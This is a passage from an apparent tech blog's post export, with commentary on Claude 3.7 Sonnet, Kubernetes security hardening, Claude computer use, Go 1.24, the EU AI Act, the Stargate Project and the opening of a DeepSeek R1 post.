harder.\nI suspect we\u0026rsquo;ll see more tools start offering a \u0026ldquo;think deeply\u0026rdquo; mode for complex tasks. This is similar to how newer IDE tools like Copilot\u0026rsquo;s agent mode are adding more sophisticated AI reasoning. The user experience challenge is making it clear when deep thinking adds value versus when it\u0026rsquo;s just adding latency.\nThere\u0026rsquo;s also an interesting transparency angle. Being able to see the model\u0026rsquo;s reasoning process makes it easier to evaluate whether to trust its output. When I can see Claude working through the logic of why a particular database index would help with a specific query pattern, I can assess whether its reasoning is sound. That\u0026rsquo;s harder to do with a model that just produces an answer.\nMy Take # After three decades of writing software, I\u0026rsquo;ve seen plenty of \u0026ldquo;this changes everything\u0026rdquo; moments that didn\u0026rsquo;t. But extended thinking feels like it addresses a genuine limitation that\u0026rsquo;s been holding back AI-assisted development: the inability of models to engage in sustained, multi-step reasoning.\nIs Claude 3.7 Sonnet going to replace senior developers? Absolutely not. The thinking process, while impressive, still occasionally goes down unproductive paths or makes assumptions that a domain expert would catch immediately. But as a pair programming partner that can actually reason through problems rather than just pattern-match? It\u0026rsquo;s the best I\u0026rsquo;ve used.\nThe competition between Anthropic, OpenAI, and Google in this space continues to benefit developers enormously. Each release pushes the boundary of what\u0026rsquo;s useful, and Claude 3.7 Sonnet has definitely raised the bar. I\u0026rsquo;m curious to see how the other players respond — reasoning capabilities seem like they\u0026rsquo;ll be the differentiator for the next phase of AI development tools.\nThis is part of my ongoing AI in Development series, tracking how artificial intelligence is reshaping software engineering in practice.\n","date":"6 March 2025","externalUrl":null,"permalink":"/posts/250306-claude-3-7-sonnet-extended-thinking/","section":"Tech Blog: AI, Security, Infrastructure \u0026 Open Source","summary":"Anthropic’s Claude 3.7 Sonnet introduces extended thinking, letting the model reason step-by-step before responding — and the implications for developer workflows are significant.","title":"Claude 3.7 Sonnet — Extended Thinking Changes the Game for AI-Assisted Development","type":"posts"},{"content":"The container ecosystem has been on an interesting trajectory lately. On one hand, Kubernetes continues its march toward maturity with each release hardening security defaults and graduating long-pending features. On the other hand, CISA and other security bodies have been publishing increasingly specific guidance about container security, reflecting both the widespread adoption and the persistent gaps in how organizations secure their containerized workloads.\nThis convergence — better tooling meeting higher expectations — is worth examining for anyone running production Kubernetes clusters, which at this point is most of us in the infrastructure space.\nThe State of Kubernetes Security in 2025 # Kubernetes has come a long way from the early days when the default configuration was essentially \u0026ldquo;trust everything.\u0026rdquo; Recent releases have been systematically addressing security concerns that practitioners have been working around for years.\nPod Security Standards, which replaced the deprecated Pod Security Policies, have been stable since 1.25 and are now widely adopted. The three levels — Privileged, Baseline, and Restricted — provide a clear framework for what pods should and shouldn\u0026rsquo;t be allowed to do. In practice, I\u0026rsquo;m seeing more organizations enforce the Restricted profile by default, with explicit exceptions for workloads that genuinely need elevated privileges.\nUser namespaces for pods, which allow mapping container root to an unprivileged user on the host, have been progressing through the beta stages. This is one of those features that sounds obscure but has significant security implications — it means that even if an attacker escapes the container, they land as an unprivileged user on the host rather than as root.\nThe ongoing work on Structured Authentication Configuration is also worth noting. Moving authentication configuration out of command-line flags and into structured, auditable configuration files is the kind of operational improvement that makes security teams sleep better at night.\nCISA\u0026rsquo;s Container Hardening Guidance # CISA has been updating its guidance on securing containerized environments, and the latest recommendations reflect a more sophisticated understanding of the container threat model than earlier versions. Key areas they\u0026rsquo;re emphasizing:\nImage supply chain security: Signing container images and verifying signatures before deployment. Tools like Sigstore\u0026rsquo;s Cosign have made this significantly easier, and the integration with Kubernetes admission controllers means you can enforce signature verification at the cluster level. If you\u0026rsquo;re not signing your images yet, this should be near the top of your priority list.\nRuntime security monitoring: Static analysis and scanning at build time catches known vulnerabilities, but runtime monitoring catches actual exploitation. Tools like Falco, Tetragon, and the commercial offerings from the likes of Sysdig and Aqua Security have matured considerably. The common pattern is using eBPF-based monitoring to detect anomalous system calls, network connections, and file access patterns without the performance overhead of traditional approaches.\nNetwork policy enforcement: The default Kubernetes networking model allows any pod to communicate with any other pod in the cluster. Network policies exist to restrict this, but adoption remains patchy. CISA\u0026rsquo;s guidance specifically calls out the importance of implementing least-privilege network policies — every pod should only be able to reach the services it actually needs.\nSecrets management: Kubernetes Secrets, stored as base64-encoded values in etcd, have always been a known weak point. The guidance pushes organizations toward external secrets management solutions — HashiCorp Vault, AWS Secrets Manager, Azure Key Vault — with the Kubernetes Secrets Store CSI driver providing a clean integration path. Encrypting Secrets at rest in etcd using KMS providers is the minimum bar.\nWhat Platform Teams Should Be Doing # Based on the current state of tooling and threat landscape, here\u0026rsquo;s what I\u0026rsquo;d recommend for platform teams managing Kubernetes in production:\nEnforce Pod Security Standards at the namespace level. Start with the Baseline profile and work toward Restricted. Use audit mode first to understand the impact before enforcing.\nImplement image signing and verification. The Sigstore ecosystem has made this accessible. Integrate Cosign into your CI/CD pipeline and use a policy engine like Kyverno or OPA Gatekeeper to enforce signature verification on admission.\nDeploy runtime security monitoring. At minimum, use Falco with a curated rule set. Monitor for unexpected process execution, network connections, and file modifications in your containers. Alert on anomalies, don\u0026rsquo;t just log them.\nAudit your network policies. Use tools like kubectl plugins or commercial solutions to visualize actual network traffic patterns, then write policies that match. Start with critical namespaces and expand outward.\nRotate credentials and review RBAC regularly. Service account tokens, kubeconfig files, and RBAC bindings tend to accumulate over time. Implement automated rotation and periodic reviews. The principle of least privilege is easy to state and hard to maintain without tooling.\nThe Supply Chain Angle # Container security doesn\u0026rsquo;t start at deployment — it starts at the Dockerfile. The recent focus on software supply chain security, like we\u0026rsquo;ve seen with CI/CD and GitHub Actions compromises, has put container build pipelines under increased scrutiny.\nUsing minimal base images (distroless, Alpine, or scratch), pinning dependencies to specific versions and hashes, scanning for vulnerabilities at build time, and generating SBOMs (Software Bills of Materials) are all practices that should be standard by now. The tooling is there — Trivy, Grype, Syft for SBOM generation — but consistent adoption remains a challenge in many organizations.\nOne pattern I\u0026rsquo;ve been advocating for is \u0026ldquo;golden image\u0026rdquo; pipelines — centrally maintained, pre-hardened base images that application teams build upon. This approach pairs well with containerized infrastructure management using Docker and infrastructure-as-code practices. This gives the security team a single place to enforce standards while giving developers a fast, compliant starting point. It\u0026rsquo;s not a new idea, but the tooling to implement it well has improved significantly.\nMy Take # The container security story in 2025 is fundamentally different from where it was even two years ago. The tools are better, the defaults are more secure, and the guidance from security organizations is more practical and specific. The gap isn\u0026rsquo;t in tooling anymore — it\u0026rsquo;s in adoption and operational discipline.\nWhat I find encouraging is the shift from \u0026ldquo;security as a gate\u0026rdquo; to \u0026ldquo;security as a platform feature.\u0026rdquo; When your Kubernetes cluster enforces pod security standards, verifies image signatures, and monitors runtime behavior by default, security becomes something the platform provides rather than something each team has to implement independently. This platform-centric approach aligns with how modern infrastructure is increasingly built with declarative, versioned configurations.\nWe\u0026rsquo;re not there yet — most clusters I encounter in the wild still have significant gaps — but the trajectory is clearly positive. The investment in getting this right is worth it. A compromised container in a well-hardened cluster is a contained incident. A compromised container in an unhardened cluster is a potential catastrophe.\nIf your platform team hasn\u0026rsquo;t done a security review of your Kubernetes setup recently, now\u0026rsquo;s a good time. The threat landscape hasn\u0026rsquo;t gotten friendlier, but at least the tools to defend against it have gotten better.\n","date":"27 February 2025","externalUrl":null,"permalink":"/posts/250227-kubernetes-container-security-hardening/","section":"Tech Blog: AI, Security, Infrastructure \u0026 Open Source","summary":"With Kubernetes pushing security features to GA and CISA issuing container hardening guidance, the container ecosystem is growing up on security. Here’s what matters for platform teams.","title":"Kubernetes 1.33 and the Container Security Hardening Push","type":"posts"},{"content":"The AI agent space has been buzzing with activity, and one development that keeps coming up in my conversations with other developers is Anthropic\u0026rsquo;s \u0026ldquo;computer use\u0026rdquo; capability for Claude. While it was initially announced in beta back in October, the real-world adoption and experimentation has been accelerating through early 2025. The idea is deceptively simple: give an AI model the ability to see a screen, move a mouse, and type on a keyboard — essentially letting it operate a computer the way a human would.\nHaving spent a few weeks experimenting with computer use in various automation scenarios, I wanted to share some thoughts on where this technology stands, where it\u0026rsquo;s genuinely useful, and where the hype outpaces reality.\nHow Computer Use Actually Works # The technical approach is straightforward in concept. Claude receives screenshots of the desktop, reasons about what it sees, and issues commands — mouse clicks at specific coordinates, keyboard input, scrolling. It\u0026rsquo;s essentially a vision-language model controlling a computer through the same interface a VNC user would.\nThe implementation typically involves running a containerized desktop environment (Anthropic provides Docker images for this), connecting Claude to it via their API, and defining the task you want accomplished. The model takes screenshots at each step, decides what to do next, and iterates until the task is complete or it gets stuck.\nWhat\u0026rsquo;s remarkable is that this works without any application-specific integration. Claude doesn\u0026rsquo;t need an API for the application it\u0026rsquo;s controlling — it reads the screen and interacts with the UI. This means it can theoretically work with any desktop application, legacy system, or web interface, including ones that have no API at all.\nWhere It Actually Shines # After experimenting with various use cases, I\u0026rsquo;ve found computer use most compelling in a few specific scenarios:\nLegacy system automation: Many organizations have critical business processes running through old desktop applications or web portals that were built before APIs were standard practice. Writing a traditional automation script for these systems is painful — you\u0026rsquo;re dealing with fragile screen scraping, COM automation, or reverse-engineering undocumented protocols. Computer use offers a higher-level abstraction: describe what you want done, and the AI figures out how to navigate the interface.\nTesting workflows: Using computer use for end-to-end testing of complex web applications is intriguing. Rather than maintaining brittle Selenium scripts that break every time the UI changes, you can describe test scenarios in natural language. \u0026ldquo;Log in, navigate to the settings page, change the notification preferences, and verify the confirmation message.\u0026rdquo; The AI handles the implementation details.\nData entry and extraction: For tasks that involve copying data between systems — pulling information from one application and entering it into another — computer use eliminates the need for custom integration code. It\u0026rsquo;s not the most efficient approach, but for low-volume, high-variety tasks, it\u0026rsquo;s remarkably practical.\nThe Limitations Are Real # Let me temper the enthusiasm with some honest assessment of the current limitations.\nSpeed: Computer use is slow. Each interaction cycle involves taking a screenshot, sending it to the API, waiting for the model to reason about it, and executing the action. A task that a human could complete in 30 seconds might take several minutes. For high-volume automation, traditional scripted approaches are still far superior.\nReliability: The model makes mistakes. It misclicks, misreads text, gets confused by pop-ups or unexpected dialog boxes, and sometimes enters a loop of incorrect actions. In my testing, I\u0026rsquo;d estimate about a 70-80% success rate on moderately complex multi-step tasks. That\u0026rsquo;s impressive for an AI system but inadequate for production automation without human oversight.\nCost: Each step involves an API call with image input, which adds up quickly. A complex workflow might involve dozens of steps, each costing a few cents. For frequent automation tasks, the economics don\u0026rsquo;t currently favor computer use over traditional scripting.\nSecurity implications: Giving an AI model control over a computer raises obvious security concerns. The model needs access to whatever the automated application can access, and a misguided action could have real consequences. Sandboxing and careful permission scoping are essential.\nThe Broader Agent Landscape # Computer use is part of a wider trend toward AI agents — systems that don\u0026rsquo;t just generate text but take actions in the real world. This aligns with broader industry moves toward agent orchestration platforms. OpenAI has been pushing its own agent frameworks, Google\u0026rsquo;s Gemini has similar capabilities in development, and the open-source community has projects like Open Interpreter that offer comparable functionality.\nWhat\u0026rsquo;s emerging is a spectrum of agent capabilities. At one end, you have tool-using models that call APIs and functions — relatively structured and predictable. At the other end, you have computer use, where the AI interacts with arbitrary interfaces through vision and motor control — flexible but less reliable.\nThe sweet spot for most production use cases is probably somewhere in the middle: agents that use structured tools (APIs, functions, databases) for core functionality, with computer use as a fallback for systems that don\u0026rsquo;t have programmatic interfaces.\nMy Take # I see computer use as a genuinely important capability, but one that\u0026rsquo;s currently better suited for prototyping, occasional automation, and handling edge cases than for production-scale operations. The technology will improve — models will get faster, more accurate, and cheaper — but the fundamental overhead of the screenshot-reason-act loop means it will likely remain slower than purpose-built integrations.\nWhere I\u0026rsquo;m most excited is the democratization of automation. Today, automating a workflow across multiple applications requires significant programming skill. Computer use lowers that barrier dramatically. A domain expert who can describe a process in plain language can now automate it, at least for personal productivity scenarios.\nFor us as developers, the implications are interesting. We should be thinking about how our applications will be used by AI agents — both through APIs (which should be the primary interface) and through UIs that agents can navigate. Accessible, well-structured interfaces aren\u0026rsquo;t just good for human users; they\u0026rsquo;re increasingly good for AI users too. As governance frameworks like the EU AI Act mature, transparent agent behavior and auditability will become compliance requirements, not just best practices.\nThe agent era is coming, but it\u0026rsquo;s coming gradually, not as a sudden revolution. Computer use is one piece of that puzzle — a powerful but imperfect tool that\u0026rsquo;s worth understanding and experimenting with, even if it\u0026rsquo;s not ready to replace your CI/CD pipeline just yet.\n","date":"20 February 2025","externalUrl":null,"permalink":"/posts/250220-anthropic-computer-use-ai-agents/","section":"Tech Blog: AI, Security, Infrastructure \u0026 Open Source","summary":"Anthropic’s computer use capability lets Claude interact with desktop applications like a human. What does this mean for automation, testing, and the future of AI agents?","title":"Claude 3.5 Gets a Computer — Anthropic's 'Computer Use' and the Future of AI Agents","type":"posts"},{"content":"Go 1.24 landed this week, and while it\u0026rsquo;s not the kind of release that generates breathless headlines, it\u0026rsquo;s the kind that makes working Go developers quietly satisfied. The headline features — generic type aliases, a new tool directive in go.mod, and the switch to Swiss Tables for the built-in map implementation — are all practical improvements that reflect Go\u0026rsquo;s continuing maturity as a language.\nI\u0026rsquo;ve been writing Go on and off since the 1.4 days, and what consistently impresses me about the project is its discipline. Go\u0026rsquo;s evolution since early releases like 1.14 shows a consistent commitment to practical improvements over chasing trends. In a world where languages compete on feature count, Go keeps saying no to things, and the things it says yes to tend to be well-considered and immediately useful. This contrasts with the broader language evolution in Python and Rust, where feature complexity is increasing while Go remains focused.\nGeneric Type Aliases: Finishing What 1.18 Started # When Go introduced generics in version 1.18 back in 2022, it was a milestone — and also deliberately incomplete. The team took the pragmatic approach of shipping the core feature and iterating. One gap was that type aliases couldn\u0026rsquo;t be parameterized. In Go 1.24, that\u0026rsquo;s fixed. This iterative improvement pattern aligns with how language ecosystems have matured to balance innovation with stability.\nYou can now write:\ntype Set[T comparable] = map[T]struct{} This might seem like a small thing, but it matters for library authors who want to provide clean, ergonomic APIs while using generic types internally. It also helps with gradual refactoring — you can introduce a type alias to ease migration between type definitions without breaking downstream consumers.\nThe broader story here is that Go\u0026rsquo;s generics are maturing. The initial release was intentionally conservative, and each subsequent release has filled in gaps based on real-world usage feedback. This incremental approach has avoided the \u0026ldquo;generics complexity explosion\u0026rdquo; that some feared. Go generics remain simpler than those in Rust, which continues to gain momentum in systems programming, and that feels intentional and correct for Go\u0026rsquo;s target audience.\nThe tool Directive: Acknowledging Developer Tooling Reality # One of the most pragmatic additions in 1.24 is the new tool directive in go.mod. This lets you declare Go-based tool dependencies directly in your module definition:\ntool ( golang.org/x/tools/cmd/stringer github.com/sqlc-dev/sqlc/cmd/sqlc ) Previously, managing tool dependencies in Go projects was awkward. The community had converged on a tools.go pattern — a file with blank imports behind a build tag — that worked but felt like a hack. The new tool directive makes this a first-class concept.\nThis is the kind of change I love about Go\u0026rsquo;s evolution. The team observed what the community was doing, recognized it as a legitimate need, and built a clean solution into the language\u0026rsquo;s tooling. No fanfare, no RFC drama — just a sensible improvement that eliminates a paper cut.\nThe go tool command now lets you run these tools directly without manual installation, pulling the right version from the module graph. Combined with the existing go generate workflow, this makes reproducible code generation significantly cleaner.\nSwiss Tables: Performance Where It Counts # Under the hood, Go 1.24 replaces the built-in map implementation with Swiss Tables, a hash table design that originated at Google\u0026rsquo;s Abseil C++ library. The new implementation offers meaningful performance improvements, particularly for maps with many entries and for operations that involve iteration during modification.\nFor most applications, this is a \u0026ldquo;free performance upgrade\u0026rdquo; — your existing code gets faster without any changes. Benchmarks from the Go team show improvements ranging from modest (single-digit percentage) for small maps to substantial (30%+) for larger ones, with memory usage also improving.\nWhat\u0026rsquo;s noteworthy is how this change was made. The built-in map is one of Go\u0026rsquo;s most fundamental data structures, and swapping its implementation is a high-risk change. The team ran extensive compatibility testing, maintained the existing behavioral guarantees (including deliberate map iteration randomization), and provided an escape hatch via GOEXPERIMENT=noswissmap for anyone who encounters issues.\nOther Highlights Worth Noting # A few other changes caught my eye:\nImproved finalizer semantics: The new runtime.AddCleanup function provides a more robust alternative to runtime.SetFinalizer, addressing several long-standing gotchas around finalizer ordering and object resurrection. If you\u0026rsquo;ve ever been bitten by finalizer-related bugs (and who hasn\u0026rsquo;t?), this is worth exploring.\nos.Root for path traversal protection: A new os.Root type restricts file system operations to a specific directory tree, preventing path traversal attacks. This is particularly valuable for server applications that handle user-provided file paths — a common source of security vulnerabilities.\nFIPS 140-3 compliance: Go 1.24 includes a mechanism for building applications with FIPS 140-3 compliant cryptography, which is increasingly required for government and regulated industry deployments. This has been a gap that pushed some organizations toward CGo-based solutions, so having it natively is significant.\nMy Take # Go 1.24 is a \u0026ldquo;boring\u0026rdquo; release in the best possible sense. There\u0026rsquo;s no paradigm shift, no controversial new feature, no \u0026ldquo;you need to rewrite your code\u0026rdquo; moment. Instead, it\u0026rsquo;s a collection of thoughtful improvements that make the language and its tooling better at the things Go is already good at.\nThis is what language maturity looks like. The exciting phase of introducing generics is giving way to the arguably more important phase of making generics work well in practice. The tooling improvements reflect a team that uses Go daily and cares about the developer experience in concrete ways.\nFor teams considering Go for new projects, the message is clear: this is a language with a long-term vision, a disciplined evolution process, and a strong commitment to backward compatibility. Your Go 1.18 code runs on Go 1.24 without changes, and it probably runs faster.\nIn an ecosystem where JavaScript runtime competition is reshaping developer tooling choices and Python\u0026rsquo;s packaging story remains a source of perpetual frustration, there\u0026rsquo;s something deeply refreshing about Go\u0026rsquo;s approach. Not every language needs to move fast and break things. Sometimes the best thing a language can do is move thoughtfully and fix things.\nI\u0026rsquo;ll be upgrading my projects over the coming weeks. The Swiss Tables improvement alone makes it worthwhile, and the tool directive will let me finally clean up those tools.go files that have always felt slightly embarrassing.\n","date":"13 February 2025","externalUrl":null,"permalink":"/posts/250213-go-124-release/","section":"Tech Blog: AI, Security, Infrastructure \u0026 Open Source","summary":"Go 1.24 brings generic type aliases, improved tool management, and Swiss Tables. A look at how Go keeps evolving without losing its identity.","title":"Go 1.24 Released — Generics Maturity and the Evolution of a Pragmatic Language","type":"posts"},{"content":"On February 2nd, the first batch of provisions from the EU AI Act became enforceable. After years of legislative wrangling, the world\u0026rsquo;s most comprehensive AI regulation is no longer theoretical — it\u0026rsquo;s law. And if you\u0026rsquo;re a developer building anything that touches AI, it\u0026rsquo;s time to pay attention, regardless of where you\u0026rsquo;re based.\nI\u0026rsquo;ve been following this legislation since its early drafts in 2021, and what strikes me now is how quickly we\u0026rsquo;ve moved from \u0026ldquo;this will never pass\u0026rdquo; to \u0026ldquo;this is enforceable and there are fines.\u0026rdquo; The gap between regulatory intent and developer awareness remains uncomfortably wide.\nWhat Just Kicked In # The EU AI Act uses a phased enforcement approach. The provisions that became applicable on February 2nd, 2025 focus on the most critical areas:\nProhibited AI practices are now banned. This includes social scoring systems by public authorities, real-time remote biometric identification in public spaces (with narrow exceptions for law enforcement), and AI systems that exploit vulnerabilities of specific groups. It also bans emotion recognition in workplaces and educational institutions, and the creation of facial recognition databases through untargeted scraping.\nAI literacy requirements are now in force. Organizations deploying AI systems must ensure that their staff have sufficient understanding of AI to operate these systems responsibly. This is vaguer than the technical provisions but signals a clear expectation that \u0026ldquo;we didn\u0026rsquo;t understand what the AI was doing\u0026rdquo; won\u0026rsquo;t fly as an excuse.\nThese are the \u0026ldquo;don\u0026rsquo;t be evil\u0026rdquo; provisions — the low-hanging fruit that most responsible developers wouldn\u0026rsquo;t engage in anyway. The more complex requirements around high-risk AI systems, general-purpose AI models, and transparency obligations phase in over the coming months and into 2026.\nThe Classification System Matters # The Act categorizes AI systems into risk tiers: unacceptable (banned), high-risk (heavily regulated), limited risk (transparency obligations), and minimal risk (largely unregulated). Understanding where your system falls is the first practical step.\nHigh-risk categories include AI used in critical infrastructure, education, employment, essential services, law enforcement, and immigration. If your AI system influences decisions in these domains, you\u0026rsquo;re looking at requirements around risk management, data governance, technical documentation, human oversight, accuracy, robustness, and cybersecurity.\nFor most of us building developer tools, content generation systems, or business automation, we\u0026rsquo;re likely in the limited or minimal risk categories. But the boundaries aren\u0026rsquo;t always obvious. A chatbot that provides general information? Minimal risk. A chatbot that provides medical or legal advice? Potentially high-risk. The classification depends on the use case, not the technology.\nGeneral-Purpose AI Model Obligations # This is where it gets particularly relevant for the current AI landscape. The Act includes specific provisions for general-purpose AI models (think GPT-4, Claude, Gemini, Llama) that apply to the model providers themselves. These include:\nMaintaining technical documentation Providing information to downstream deployers Complying with EU copyright law Publishing sufficiently detailed summaries of training data Models deemed to pose \u0026ldquo;systemic risk\u0026rdquo; — currently defined by a compute threshold of 10^25 FLOPs — face additional requirements including model evaluation, adversarial testing, incident reporting, and cybersecurity measures.\nFor developers using these models through APIs, the practical impact is indirect but real. Expect model providers to update their terms of service, potentially restrict certain use cases in the EU, and provide more detailed documentation about model capabilities and limitations. The compliance requirements are reshaping how AI platforms are built and deployed, as major vendors incorporate governance into their architecture. Some of this is already happening — OpenAI and Google have both been updating their compliance frameworks.\nWhat This Means Outside Europe # If you\u0026rsquo;re thinking \u0026ldquo;I\u0026rsquo;m not in the EU, this doesn\u0026rsquo;t apply to me\u0026rdquo; — not so fast. The Act applies to any AI system that is placed on the market in the EU or whose output is used in the EU. If you\u0026rsquo;re building a SaaS product with AI features and you have European customers, you\u0026rsquo;re in scope.\nThis is the \u0026ldquo;Brussels Effect\u0026rdquo; that we\u0026rsquo;ve seen with GDPR. European regulation tends to set a de facto global standard because it\u0026rsquo;s often easier for companies to build one compliant product than to maintain separate versions for different markets. I expect a similar dynamic to play out with AI regulation.\nThe US is taking a very different approach — the recent executive orders have focused more on promoting AI development than restricting it, and the Stargate infrastructure announcement from a couple of weeks ago underscores the current administration\u0026rsquo;s priority on AI acceleration. This regulatory divergence creates complexity for anyone operating across both markets.\nPractical Steps for Developer Teams # Based on my reading of the Act and conversations with colleagues navigating compliance, here\u0026rsquo;s what I\u0026rsquo;d recommend for development teams right now:\nAudit your AI usage: Map out where you\u0026rsquo;re using AI systems and how they influence decisions. You might be surprised how many AI touchpoints exist across your product.\nClassify your risk level: Use the Act\u0026rsquo;s framework to understand which tier your applications fall into. The EU AI Act Compliance Checker is a useful starting point.\nDocument everything: Technical documentation requirements are coming for high-risk systems. Start building the habit now — document your training data, model choices, evaluation metrics, and known limitations.\nReview your supply chain: If you\u0026rsquo;re using third-party AI models or services, understand your obligations as a \u0026ldquo;deployer\u0026rdquo; versus a \u0026ldquo;provider\u0026rdquo; under the Act. The responsibility allocation isn\u0026rsquo;t always intuitive.\nInvest in AI literacy: The literacy requirement applies now. Make sure your team understands not just how to use AI tools, but their limitations, biases, and appropriate use cases.\nMy Take # I have mixed feelings about the EU AI Act. On one hand, some form of regulation is clearly needed — the pace of AI deployment has outstripped our ability to understand its societal impact, and self-regulation hasn\u0026rsquo;t been sufficient. The Act\u0026rsquo;s risk-based approach is sensible, and the focus on prohibited practices targets genuinely harmful applications. These practical implications are explored in depth in the compliance requirements developers need to implement.\nOn the other hand, I worry about the compliance burden on smaller companies and open-source projects. The Act includes some exemptions for research and open-source, but the boundaries are unclear. And the pace of AI development is so fast that regulations drafted in 2022-2023 are already struggling to keep up with the reality of 2025.\nWhat I hope we don\u0026rsquo;t see is a repeat of the early GDPR days, where fear and uncertainty led to over-compliance and the blocking of useful services for European users. The AI Act is more nuanced than many people realize, and the risk-based approach means that most AI applications face relatively light requirements. But nuance tends to get lost in corporate compliance departments.\nFor now, the most important thing is awareness. Read the Act, understand where your systems fit, and start building compliance into your development process. The full enforcement timeline stretches to 2027, but the direction of travel is clear — and the earlier you start, the less painful the transition will be.\n","date":"6 February 2025","externalUrl":null,"permalink":"/posts/250206-eu-ai-act-takes-effect/","section":"Tech Blog: AI, Security, Infrastructure \u0026 Open Source","summary":"The first provisions of the EU AI Act are now enforceable. Here’s what the regulation means for developers building AI systems, and why you should care even if you’re not in Europe.","title":"EU AI Act Takes Effect — What Developers Need to Know Right Now","type":"posts"},{"content":"Last week, the tech world was still processing the Stargate Project announcement — a joint venture between OpenAI, SoftBank, and Oracle to pour up to $500 billion into AI infrastructure in the United States over the next four years. That\u0026rsquo;s not a typo. Half a trillion dollars, aimed at building out the data centers, power infrastructure, and compute capacity needed to train and serve the next generation of AI models.\nAs someone who\u0026rsquo;s watched infrastructure trends for decades — from the early days of colocation facilities to the cloud revolution — I find myself both impressed and cautious about what this signals.\nThe Scale Is Unprecedented # To put $500 billion in perspective, the entire global cloud infrastructure market was estimated at around $270 billion in 2024. The Stargate Project, if fully realized, would represent nearly double that figure concentrated in a single initiative. The initial $100 billion phase is already underway, with construction beginning on a massive campus in Abilene, Texas.\nThe consortium brings together complementary strengths: OpenAI\u0026rsquo;s model expertise, SoftBank\u0026rsquo;s capital and telecommunications infrastructure, Oracle\u0026rsquo;s enterprise cloud capabilities, and reportedly significant involvement from MGX (an Abu Dhabi-based technology investment vehicle). NVIDIA, ARM, and Microsoft are listed as technology partners.\nWhat strikes me most is the vertical integration play. This isn\u0026rsquo;t just about renting GPU time from existing cloud providers. It\u0026rsquo;s about building purpose-built facilities optimized from the ground up for AI workloads — from the power grid connection to the cooling systems to the network fabric between GPU clusters. This approach mirrors the infrastructure investments we\u0026rsquo;re seeing from competitors like NVIDIA and custom chip strategies like Google\u0026rsquo;s TPUs.\nWhy Now? The Compute Bottleneck Is Real # If you\u0026rsquo;ve tried to secure GPU capacity for training or fine-tuning models recently, you know the pain. Wait times for H100 clusters can stretch into months. Spot instance prices for AI-capable hardware remain eye-watering. The demand for AI compute is growing faster than the supply, and the gap is widening.\nThe major cloud providers — AWS, Azure, and Google Cloud — have all been investing heavily in their own AI infrastructure, but even their combined capital expenditure hasn\u0026rsquo;t kept pace with demand. This challenge parallels broader cloud infrastructure and platform engineering concerns about optimal resource utilization and scaling. Amazon alone committed to spending $75 billion on infrastructure in 2025, much of it AI-related. Google and Microsoft are in a similar arms race.\nThe Stargate Project represents a bet that we\u0026rsquo;ll need dramatically more compute than even the hyperscalers are planning for. Whether you believe that bet depends on your view of where AI is heading — are we approaching diminishing returns on scaling, or are there still orders-of-magnitude improvements to unlock with bigger models and more data?\nImplications for Developers and Enterprises # For those of us building applications on top of AI infrastructure — running large language models and foundation models — this wave of investment has several practical implications. The efficiency gains from better model architectures will matter as much as raw infrastructure capacity.\nCost trajectory: More supply should eventually mean lower prices. If Stargate and similar investments materially increase the available compute pool, the cost of inference — running trained models — should continue to decline. That\u0026rsquo;s good news for anyone building AI-powered products. We\u0026rsquo;ve already seen inference costs drop dramatically over the past year, and more capacity should accelerate that trend.\nGeographic concentration: The focus on US-based infrastructure is notable, especially in the context of increasing AI regulation and data sovereignty concerns in Europe. For European developers and enterprises, this raises questions about latency, data residency, and dependence on US infrastructure for critical AI capabilities. It\u0026rsquo;s something I\u0026rsquo;m watching closely from here in the Netherlands.\nPlatform dynamics: The involvement of Oracle as a key infrastructure partner is interesting. Oracle has been aggressively repositioning its cloud business around AI workloads, and this partnership could accelerate its credibility in a market still dominated by AWS, Azure, and GCP. For developers, more viable infrastructure options is generally a good thing — competition drives innovation and keeps pricing honest.\nThe Elephant in the Room: Power # Every conversation about massive AI data centers eventually comes back to power. Training large language models is extraordinarily energy-intensive, and the projected power requirements for facilities of this scale are staggering. Some estimates suggest that AI data center power consumption could double or triple by 2028.\nThe Stargate announcement was light on details about power sourcing, though there have been mentions of exploring nuclear and renewable options. This is where I start to feel uneasy. We\u0026rsquo;re making enormous infrastructure bets on the assumption that we\u0026rsquo;ll figure out the power problem. And while I\u0026rsquo;m optimistic about nuclear energy\u0026rsquo;s potential role, the timelines for bringing new nuclear capacity online don\u0026rsquo;t align well with the pace of data center construction.\nAs engineers, we should also be thinking about efficiency. There\u0026rsquo;s meaningful work happening on model compression, quantization, and more efficient architectures with smaller models. The combination of infrastructure investment and efficiency improvements will drive sustainable AI development. The most sustainable path forward likely combines more efficient models with more infrastructure, not just brute-force scaling.\nMy Take # I\u0026rsquo;ve seen enough infrastructure build-outs to know that the announced number and the actual spend often diverge significantly. $500 billion is an aspiration, not a commitment. The real test will be whether the initial $100 billion phase delivers results compelling enough to justify the rest.\nThat said, the directional signal is clear: the biggest players in tech believe we\u0026rsquo;re in the early innings of AI infrastructure build-out, not the late innings. Whether you\u0026rsquo;re a developer choosing which cloud to build on, an enterprise planning your AI strategy, or an infrastructure engineer thinking about your next role — this is worth paying attention to.\nThe era of AI infrastructure as a strategic asset, not just a utility, is here. And the scale of investment being mobilized suggests that the companies behind Stargate believe the returns will justify the spend. Time will tell if they\u0026rsquo;re right, but in the meantime, the rest of us should be thinking about what a world with dramatically more AI compute looks like — and how to build for it.\n","date":"30 January 2025","externalUrl":null,"permalink":"/posts/250130-stargate-project-ai-infrastructure/","section":"Tech Blog: AI, Security, Infrastructure \u0026 Open Source","summary":"The newly announced Stargate Project promises $500B in AI infrastructure investment. What does this mean for the cloud landscape and developers building on top of it?","title":"The Stargate Project — $500 Billion and the Future of AI Infrastructure","type":"posts"},{"content":"This week, Chinese AI lab DeepSeek released R1, a reasoning-focused large language model that\u0026rsquo;s turning heads across the AI community. Not because reasoning models are new — OpenAI\u0026rsquo;s o1 has been available since September — but because of what DeepSeek has achieved and how they\u0026rsquo;ve released it. R1 matches or exceeds o1-preview on most major benchmarks, the full model weights are available under an MIT license, and the technical paper suggests it was trained at a fraction of the cost that US labs typically spend.\nI\u0026rsquo;ve spent the past two days reading the paper, testing the model, and talking to colleagues about the implications. This is one of those releases that deserves more than a headline.\nWhat Makes R1 Different # DeepSeek R1 is a reasoning model, meaning it\u0026rsquo;s designed to \u0026ldquo;think through\u0026rdquo; complex problems step by step before producing an answer. This is the same paradigm that OpenAI introduced with reasoning models — the model generates a chain of thought, exploring different approaches and self-correcting before arriving at a final answer. The difference is that OpenAI keeps their reasoning hidden and the model proprietary. DeepSeek shows you the reasoning and gives you the weights.\nThe benchmark numbers are impressive. R1 scores competitively with o1 on math (AIME, MATH-500), coding (Codeforces, SWE-Bench), and general reasoning tasks. On some benchmarks, it outperforms o1-preview. These aren\u0026rsquo;t cherry-picked results — the scores are 